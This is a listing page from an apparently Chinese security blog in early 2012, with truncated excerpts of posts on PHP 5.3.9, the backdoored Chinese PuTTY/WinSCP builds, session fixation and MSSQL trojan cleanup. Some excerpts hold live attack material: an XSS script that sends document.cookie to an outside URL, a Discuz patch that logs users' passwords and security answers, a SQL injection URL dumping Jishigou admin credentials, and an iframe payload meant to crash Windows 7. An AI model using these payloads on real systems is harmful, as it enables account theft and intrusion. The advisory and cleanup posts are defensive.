PHP 5.3.9 重大漏洞 多语言拒绝服务漏洞事件预警

分类:新闻 | 2012-02-4 | 撸过 497 次
0人扯谈

安全部门监测到目前PHP 5.3.9被黑客发现存在严重的安全漏洞,远程攻击者可以直接利用此漏洞执行任意PHP代码,安全风险非常高。经过跟进,该漏洞(CVE-2012-0830)是由于PHP官方为解决多语言hash漏洞引入了新的机制产生的新的安全漏洞。

【漏洞影响版本】

PHP5.3.9

注:在修复PHP多语言hash漏洞时若采用直接打补丁的方式(补丁地址:点击查看)不受此漏洞影响。

【修复方案】

目前PHP官方已经紧急发布了5.3.10,下载地址为点击进入 ,请所有使用PHP 5.3.9版本的机器负责人尽快更新到PHP 5.3.10,建议更新前先进行测试。

之前还没有完成PHP多语[......]

继续阅读

简单的HTML代码弄死Windows 7

分类:新闻 | 2012-02-4 | 撸过 511 次
1人扯谈

这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3vil报告的。该漏洞在64位的Win7下的Safari 浏览器测试中招,我很讨厌蓝屏,因此没有测试其他浏览器。微软正在进一步验证该漏洞,下面是关于该漏洞的一些技术细节:

<iframe height='18082563'></iframe>

注意:请为自己的测试负责.

描述:

该漏洞是由于 win32k.sys 的一个错误导[......]

继续阅读

跨站提取cookie的原理

分类:安全 | 2012-02-3 | 撸过 678 次
1人扯谈

个人理解为跨站就意味着可以执行javascript代码,javascript利用Document文档对象的cookie属性就获取到了cookie,然后就可能利用cookie欺骗登陆。

跨站提取cookie的原理 等价于
如何从在浏览器中获取cookie + 发送cookie到指定url

比如:

<script>document.write('<img src="https://www.webshell.cc/test.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script&[......]

继续阅读

Discuz 密码记录

分类:安全 | 2012-02-3 | 撸过 670 次
0人扯谈
//打开source/function/function_member.php

//找到function userlogin

//在return $return;前面加上

$a=file_get_contents(dirname(__FILE__).’/1.txt’);

file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);

//记录登陆成功的账号密码以及问题答案![......]

继续阅读

putty和WinSCP后门检查及清理方式

分类:技术 | 2012-02-3 | 撸过 390 次
0人扯谈

检查及清理方式

  检查/var/log 是否被删除# /usr/bin/stat /var/log
  如果被删除了,说明中招了
  查看/var/log 文件夹内容# ls -al /var/log
  如果文件很少,说明中招了
  监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f \| /bin/grep syslog
  如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆
  检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /[......]

继续阅读

创宇安全研究团队:中文版putty后门事件分析

分类:新闻 | 2012-02-1 | 撸过 440 次
1人扯谈

近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动
窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分
析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、
WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。

1.时间线

1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人[......]

继续阅读

部分中文版PuTTY和WinSCP软件内置后门

分类:新闻 | 2012-02-1 | 撸过 455 次
0人扯谈

多个安全达人在微博发布消息,称在汉化版putty、WinSCP、SSH Secure等工具中发现后门。经金山毒霸安全中心验证,这些汉化版管理工具的确存在后门程序,可窃取管理员帐号,从而完全控制linux服务器。建议linux系统管理员应立刻卸载这些汉化版软件,并尽快修改管理员密码。

近期已经有多名Linux服务器管理员爆出服务器被恶意攻击,导致系统root密码泄漏以及资料泄漏,经查可能是由于内置后门的PuTTY和WinSCP工具导致。

PuTTY是知名的Windows开源SSH管理工具,WinSCP是常用的开源SFTP工具。两者皆为免费、开源软件,其中PuTTY从没有官方中文版,而Wi[......]

继续阅读

记事狗微博3.0 漏洞

分类:安全 | 2012-02-1 | 撸过 476 次
2人扯谈

不解释,你懂得!
 

https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20f[......]

继续阅读

关于Session Fixation

分类:安全 | 2012-01-31 | 撸过 474 次
0人扯谈

前两天我转了篇文章到pst的邮件列表,是关于在struts 2框架下重新生成session的,引起了一些讨论,我觉得有必要在这里提醒下程序员们,可能他们早就遗忘了这种威胁了。

JSESSIONID Regeneration in Struts 2

实际上这就是一种针对Session Fixation 的防范。

Session Fixation 翻译过来就是 “Session 完成攻击”,以前的老的应用里可能比较常见这种问题,但是随着现在web应用越来越复杂,这种问题已经很少了。

先理解这个攻击,打个比方:

1. 你花钱买了一辆车
2. 你把车钥匙复制了一把
3. 你把这辆车卖给了一个[......]

继续阅读

mssql 清除木马

分类:技术 | 2012-01-31 | 撸过 358 次
0人扯谈

代码如下:

drop table te

drop function dbo.mdSQL

select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,systypes c
where b.xtype='U' and a.id=b.id and a.xtype=c.xtype
and c.name in ('text','ntext','varchar','nvarchar','char','nchar')

go
create function mdSQL(@tbname varchar(10[......]

继续阅读

第 30 页,共 70 页« 最新...1020...2829303132...405060...最旧 »